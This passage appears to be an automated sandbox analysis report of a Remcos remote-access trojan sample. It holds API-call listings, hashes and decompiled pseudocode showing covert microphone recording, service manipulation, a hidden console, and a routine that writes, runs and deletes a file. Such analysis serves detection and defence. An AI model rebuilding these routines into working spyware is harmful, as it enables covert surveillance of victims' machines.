                                                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                                                                • String ID: ^"A
                                                                                • API String ID: 1083762089-1057680782
                                                                                • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                                                                • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                                                                • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                                                                • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 15%
                                                                                			E00411C4C(void* __eflags, intOrPtr _a4) {
                                                                                				char _v20;
                                                                                				void* _v36;
                                                                                				char _v52;
                                                                                				int _t21;
                                                                                				signed int _t35;
                                                                                				void* _t39;
                                                                                				void* _t45;
                                                                                				void* _t61;
                                                                                				void* _t62;
                                                                                				void* _t63;
                                                                                				void* _t64;
                                                                                				void* _t65;
                                                                                				intOrPtr _t67;
                                                                                				void* _t69;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				void* _t75;
                                                                                
                                                                                				_t75 = __eflags;
                                                                                				_t67 = _a4;
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
                                                                                				_t21 = SetEvent( *(_t67 + 0x28));
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				_t71 = _t69;
                                                                                				_t45 = _t71;
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                                                                				_t72 = _t71 + 0x24;
                                                                                				_t61 =  *_t21 - 0x61;
                                                                                				if(_t61 == 0) {
                                                                                					_push(E0040180C( &_v20, __eflags, 2));
                                                                                					_push(E0040180C( &_v20, __eflags, 1));
                                                                                					_push(E0040180C( &_v20, __eflags, 0));
                                                                                					_push(_t72 - 0x10);
                                                                                					E00411D8A(E00412881(_t29));
                                                                                				} else {
                                                                                					_t62 = _t61 - 0x3d;
                                                                                					if(_t62 == 0) {
                                                                                						E00411A24(_t45);
                                                                                					} else {
                                                                                						_t63 = _t62 - 4;
                                                                                						if(_t63 == 0) {
                                                                                							_t35 = E0040180C( &_v20, __eflags, 0);
                                                                                							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
                                                                                							__eflags =  *_t35;
                                                                                							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
                                                                                						} else {
                                                                                							_t64 = _t63 - 3;
                                                                                							if(_t64 == 0) {
                                                                                								_t39 =  *0x41c1d4;
                                                                                								__eflags = _t39;
                                                                                								if(_t39 != 0) {
                                                                                									SetEvent(_t39);
                                                                                								}
                                                                                							} else {
                                                                                								_t65 = _t64 - 1;
                                                                                								if(_t65 == 0) {
                                                                                									 *0x41c1d2 = 1;
                                                                                								} else {
                                                                                									if(_t65 == 1) {
                                                                                										 *0x41c1d3 = 1;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				E004017DD( &_v20);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                                                                • SetEvent.KERNEL32(?), ref: 00411C6D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00411C8A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • SetEvent.KERNEL32(?), ref: 00411CF8
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                                                                • String ID:
                                                                                • API String ID: 3236006214-0
                                                                                • Opcode ID: 1c6a20819715abfce900e6b93ff025b8969689805c2dba6f51610803d5a8fa04
                                                                                • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                                                                • Opcode Fuzzy Hash: 1c6a20819715abfce900e6b93ff025b8969689805c2dba6f51610803d5a8fa04
                                                                                • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E00401519(WCHAR* __eax, void* __eflags) {
                                                                                				char* _t4;
                                                                                				signed int _t5;
                                                                                				CHAR* _t10;
                                                                                				signed int _t11;
                                                                                				signed int _t19;
                                                                                				signed int _t20;
                                                                                				intOrPtr* _t26;
                                                                                				void* _t27;
                                                                                
                                                                                				_t27 = __eflags;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				CreateDirectoryW(__eax, 0);
                                                                                				0x41b218->wFormatTag = 1;
                                                                                				 *0x41b21a = 1;
                                                                                				 *0x41b21c = 0x1f40;
                                                                                				 *0x41b226 = 8;
                                                                                				 *0x41b220 = 0x1f40;
                                                                                				 *0x41b224 = 1;
                                                                                				 *0x41b228 = 0;
                                                                                				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t5 = atoi(_t4);
                                                                                				_t19 =  *0x41b21c; // 0x0
                                                                                				 *_t26 = 0x30008;
                                                                                				_t20 = _t19 * _t5 * 0x3c;
                                                                                				 *0x41b1d0 = _t20;
                                                                                				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
                                                                                				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
                                                                                				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				0x41b1a0->lpData = _t10;
                                                                                				_t11 =  *0x41b1d8; // 0x0
                                                                                				 *0x41b1a4 = _t11;
                                                                                				 *0x41b1a8 = 0;
                                                                                				 *0x41b1ac = 0;
                                                                                				 *0x41b1b0 = 0;
                                                                                				 *0x41b1b4 = 0;
                                                                                				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                                                                				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                                                                				waveInStart( *0x41b210);
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                                                                • atoi.MSVCRT ref: 0040157F
                                                                                • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                                                                • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                                                                • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                                                                • waveInStart.WINMM ref: 00401633
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                                                                • String ID:
                                                                                • API String ID: 1097200658-0
                                                                                • Opcode ID: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                                                                • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                                                                • Opcode Fuzzy Hash: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                                                                • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                                                                • SetEvent.KERNEL32(?), ref: 0040F16D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040F18E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                                                                  • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                                                                  • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                                                                  • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                                                                  • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                                                                  • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                                                                  • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                                                                  • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                                                                  • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                                                                  • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                                                                  • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                                                                  • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                                                                  • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                                                                  • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                                                                  • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                                                                  • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                                                                  • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                                                • String ID:
                                                                                • API String ID: 3444260106-0
                                                                                • Opcode ID: c63ab60c1a98669919cb26f4f991ffaadf3270ae8065bccc709894317ab7d55a
                                                                                • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                                                                • Opcode Fuzzy Hash: c63ab60c1a98669919cb26f4f991ffaadf3270ae8065bccc709894317ab7d55a
                                                                                • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E004117C7(void* _a4) {
                                                                                				intOrPtr _v28;
                                                                                				struct _SERVICE_STATUS _v32;
                                                                                				short* _t6;
                                                                                				signed int _t12;
                                                                                				int _t20;
                                                                                				void* _t23;
                                                                                				void* _t24;
                                                                                
                                                                                				_t20 = 0;
                                                                                				_t6 = OpenSCManagerW(0, 0, 0x11);
                                                                                				_t24 = _t6;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
                                                                                				if(_t23 != 0) {
                                                                                					if(ControlService(_t23, 1,  &_v32) != 0) {
                                                                                						do {
                                                                                							QueryServiceStatus(_t23,  &_v32);
                                                                                						} while (_v28 != 1);
                                                                                						_t12 = StartServiceW(_t23, 0, 0);
                                                                                						asm("sbb eax, eax");
                                                                                						_t20 = ( ~_t12 & 0x000000fe) + 3;
                                                                                					} else {
                                                                                						_t20 = 2;
                                                                                					}
                                                                                					CloseServiceHandle(_t24);
                                                                                					CloseServiceHandle(_t23);
                                                                                				} else {
                                                                                					CloseServiceHandle(_t24);
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t20;
                                                                                			}











                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                                                                • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                                                                • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                                                                • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 63%
                                                                                			E00413D3D(signed int __edx, intOrPtr _a4) {
                                                                                				void _v1003;
                                                                                				char _v1004;
                                                                                				struct HWND__* _t13;
                                                                                				signed int _t34;
                                                                                				signed int _t36;
                                                                                				unsigned int _t40;
                                                                                				signed int _t41;
                                                                                				signed int _t47;
                                                                                				signed int _t50;
                                                                                				signed int _t56;
                                                                                				signed int _t59;
                                                                                				signed int _t64;
                                                                                				signed int _t65;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                
                                                                                				_t64 = __edx;
                                                                                				AllocConsole();
                                                                                				_t13 =  *0x41c1f8();
                                                                                				 *0x41c1fc = _t13;
                                                                                				if(_a4 == 0) {
                                                                                					ShowWindow(_t13, 0);
                                                                                				}
                                                                                				freopen("CONOUT$", 0x416e44, __imp___iob + 0x20);
                                                                                				_v1004 = 0;
                                                                                				memset( &_v1003, 0, 0xf9 << 2);
                                                                                				asm("stosw");
                                                                                				asm("stosb");
                                                                                				_t65 = _t64 | 0xffffffff;
                                                                                				asm("repne scasb");
                                                                                				_t40 =  !_t65;
                                                                                				_t91 = " * Remcos v" - _t40;
                                                                                				_t41 = _t40 >> 2;
                                                                                				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                                                                				asm("repne scasb");
                                                                                				_t47 =  !_t65;
                                                                                				_t92 = "2.7.2 Pro" - _t47;
                                                                                				_t34 = _t47;
                                                                                				asm("repne scasb");
                                                                                				_t50 = _t34 >> 2;
                                                                                				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                                                                				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                                                                				asm("repne scasb");
                                                                                				_t56 =  !_t65;
                                                                                				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
                                                                                				_t36 = _t56;
                                                                                				asm("repne scasb");
                                                                                				_t59 = _t36 >> 2;
                                                                                				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                                                                				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                                                                				return printf( &_v1004);
                                                                                			}




















                                                                                APIs
                                                                                • AllocConsole.KERNEL32(00017838,0041BCB0,00000000), ref: 00413D49
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                                                                • freopen.MSVCRT ref: 00413D7C
                                                                                • printf.MSVCRT ref: 00413E25
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
